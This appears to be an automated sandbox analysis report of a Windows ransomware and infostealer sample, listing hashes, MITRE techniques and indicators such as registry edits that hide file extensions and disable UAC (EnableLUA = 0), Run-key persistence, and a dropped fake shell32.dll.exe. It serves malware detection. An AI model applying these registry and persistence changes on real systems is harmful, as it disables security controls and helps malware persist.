101709ca246d0ef5a9dad2f4fcaadc6325f122563636e340ebe692f5c3c7f371

Analysis

max time kernel
1800s
max time network
1751s
platform
windows11-21h2_x64
resource
win11-20240412-en
resource tags

arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
submitted
25-04-2024 14:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
Size

131KB
MD5

c055414e00cb301e35740f3591df4ea4
SHA1

e221f5b1ac929c2c04a1fb9e27c6e43d030a0fbb
SHA256

e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
SHA512

b7be9688a8d6ffa02b67948d4b5b2749396e26a2893ff736ea707c10ad15d8a0314b9d3dfcb1383e50e33c3d82f2e4f72afba2d6e1a3f4ec6e087ac02241ac12
SSDEEP

3072:1uxMFsg7SYqAnWAu95iwtLVymzq1MOggzR557/PTShlllllllYPA7Ra3Z:5lSYup9nLomzq1MOggzNPT7PKa3

Score

10^/10

evasion persistence ransomware spyware stealer trojan

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Renames multiple (85) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Executes dropped EXE 2 IoCs

Processes:

JIkEQwQQ.exeLWIMogsY.exe

pid process

3068 JIkEQwQQ.exe
4172 LWIMogsY.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exeJIkEQwQQ.exeLWIMogsY.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LWIMogsY.exe = "C:\\ProgramData\\WsQYcsws\\LWIMogsY.exe"	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\JIkEQwQQ.exe = "C:\\Users\\Admin\\TcwcwEMA\\JIkEQwQQ.exe"	JIkEQwQQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LWIMogsY.exe = "C:\\ProgramData\\WsQYcsws\\LWIMogsY.exe"	LWIMogsY.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\JIkEQwQQ.exe = "C:\\Users\\Admin\\TcwcwEMA\\JIkEQwQQ.exe"	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe

Drops file in System32 directory 2 IoCs

Processes:

JIkEQwQQ.exe

description	ioc	process
File created	C:\Windows\SysWOW64\shell32.dll.exe	JIkEQwQQ.exe
File opened for modification	C:\Windows\SysWOW64\shell32.dll.exe	JIkEQwQQ.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

pid pid_target process target process

2264 3068 JIkEQwQQ.exe

pid	pid_target	process	target process
2264	3068		JIkEQwQQ.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

Processes:

pid	process
1556	reg.exe
4700	reg.exe
3796	reg.exe
2092	reg.exe
3796	reg.exe
2012	reg.exe
5676	reg.exe
4220	reg.exe
3556	reg.exe
4724	reg.exe
2912	reg.exe
3924	reg.exe
1796	reg.exe
4092	reg.exe
5268	reg.exe
5732	reg.exe
5448	reg.exe
4896	reg.exe
5848	reg.exe
5016	reg.exe
324	reg.exe
2792	reg.exe
4960	reg.exe
5796	reg.exe
2472	reg.exe
4644	reg.exe
1100	reg.exe
1316	reg.exe
4340	reg.exe
2416	reg.exe
800	reg.exe
4984	reg.exe
2616	reg.exe
1816	reg.exe
1172	reg.exe
5784	reg.exe
5232	reg.exe
3440	reg.exe
3468
3780	reg.exe
1836	reg.exe
2152	reg.exe
5344	reg.exe
2248	reg.exe
4424	reg.exe
1196
3172	reg.exe
224	reg.exe
3428	reg.exe
2244	reg.exe
4712	reg.exe
5488	reg.exe
5072	reg.exe
5520	reg.exe
1812	reg.exe
4992	reg.exe
5476	reg.exe
2220	reg.exe
2904	reg.exe
648	reg.exe
5828	reg.exe
1880	reg.exe
5888	reg.exe
6012	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe

pid	process
5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5652	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5652	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5652	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5652	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5544	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5544	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5544	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5544	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
4264	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
4264	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
4264	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
4264	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
3400	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
3400	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
3400	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
3400	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
3348	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
